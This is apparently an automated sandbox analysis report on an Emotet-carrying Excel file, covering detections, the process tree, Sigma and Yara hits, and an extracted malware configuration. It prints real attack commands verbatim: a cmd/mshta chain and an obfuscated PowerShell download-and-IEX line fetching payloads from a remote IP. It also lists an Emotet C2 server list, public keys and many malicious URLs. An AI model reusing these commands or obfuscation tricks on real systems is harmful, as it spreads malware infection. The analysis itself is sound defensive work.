Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOCUMENT_2801.xls

Overview

General Information

Sample Name:DOCUMENT_2801.xls
Analysis ID:562416
MD5:3f397d9cca325167d86d575896d40207
SHA1:54b8106c1715eb58230371fa033cbdec1e3aaeff
SHA256:f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 684 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 572 cmdline: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2668 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2672 cmdline: cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • mshta.exe (PID: 2696 cmdline: mshta http://91.240.118.172/ee/ss/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
          • powershell.exe (PID: 1708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
            • cmd.exe (PID: 1868 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
              • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1124 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 344 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
DOCUMENT_2801.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x140a2:$s1: Excel
  • 0x15105:$s1: Excel
  • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
DOCUMENT_2801.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\DOCUMENT_2801.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x140a2:$s1: Excel
    • 0x15105:$s1: Excel
    • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\DOCUMENT_2801.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\Milossd.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 65 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  17.2.rundll32.exe.27d0000.7.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    14.2.rundll32.exe.25b0000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      17.2.rundll32.exe.3090000.27.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        17.2.rundll32.exe.2f70000.23.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          13.2.rundll32.exe.3c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 97 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/ee/ss/se.html , CommandLine: mshta http://91.240.118.172/ee/ss/se.html , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2672, ProcessCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ProcessId: 2696
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 684, ProcessCommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, ProcessId: 572
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3Avira URL Cloud: Label: malware
                            Source: http://engaz.shop/wp-content/MOllqUm2nb/PE3Avira URL Cloud: Label: malware
                            Source: http://engaz.shop/wp-content/MOllqUm2nb/Avira URL Cloud: Label: malware
                            Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/ee/ss/se.htmlAvira URL Cloud: Label: malware
                            Source: http://3-fasen.com/wp-content/3Bl0hBbW/PE3Avira URL Cloud: Label: malware
                            Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/Avira URL Cloud: Label: malware
                            Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1Avira URL Cloud: Label: malware
                            Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/Avira URL Cloud: Label: malware
                            Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3Avira URL Cloud: Label: malware
                            Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3Avira URL Cloud: Label: malware
                            Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3Avira URL Cloud: Label: malware
                            Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3Avira URL Cloud: Label: malware
                            Source: http://tamiladsense.com/wp-incluAvira URL Cloud: Label: malware
                            Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/Avira URL Cloud: Label: malware
                            Source: http://imaginariumstore.fun/ncsbAvira URL Cloud: Label: malware
                            Source: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3Avira URL Cloud: Label: malware
                            Source: https://ecobaby.pi-dh.com/SerendAvira URL Cloud: Label: malware
                            Source: http://3-fasen.com/wp-content/3BAvira URL Cloud: Label: malware
                            Source: http://onexone.elementor.cloud/cAvira URL Cloud: Label: malware
                            Source: http://3-fasen.com/wp-content/3Bl0hBbW/Avira URL Cloud: Label: malware
                            Source: http://engaz.shop/wp-content/MOlAvira URL Cloud: Label: malware
                            Source: https://mypurealsystem.com/App_Start/Rhh8lKO/Avira URL Cloud: Label: malware
                            Source: https://vn.minino.com/wp-admin/c3WQa/PE3Avira URL Cloud: Label: malware
                            Source: https://vn.minino.com/wp-admin/c3WQa/Avira URL Cloud: Label: malware
                            Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/Avira URL Cloud: Label: malware
                            Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3Avira URL Cloud: Label: malware
                            Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/Avira URL Cloud: Label: malware
                            Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/Avira URL Cloud: Label: malware
                            Source: http://tamiladsense.comAvira URL Cloud: Label: malware
                            Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/Avira URL Cloud: Label: malware
                            Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/Avira URL Cloud: Label: malware
                            Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/ee/ss/se.pngAvira URL Cloud: Label: malware
                            Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3Avira URL Cloud: Label: malware
                            Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/Avira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 17.2.rundll32.exe.3090000.27.unpackMalware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                            Multi AV Scanner detection for submitted file
                            Source: DOCUMENT_2801.xlsReversingLabs: Detection: 16%
                            Multi AV Scanner detection for domain / URL
                            Source: tamiladsense.comVirustotal: Detection: 7%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\Milossd.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
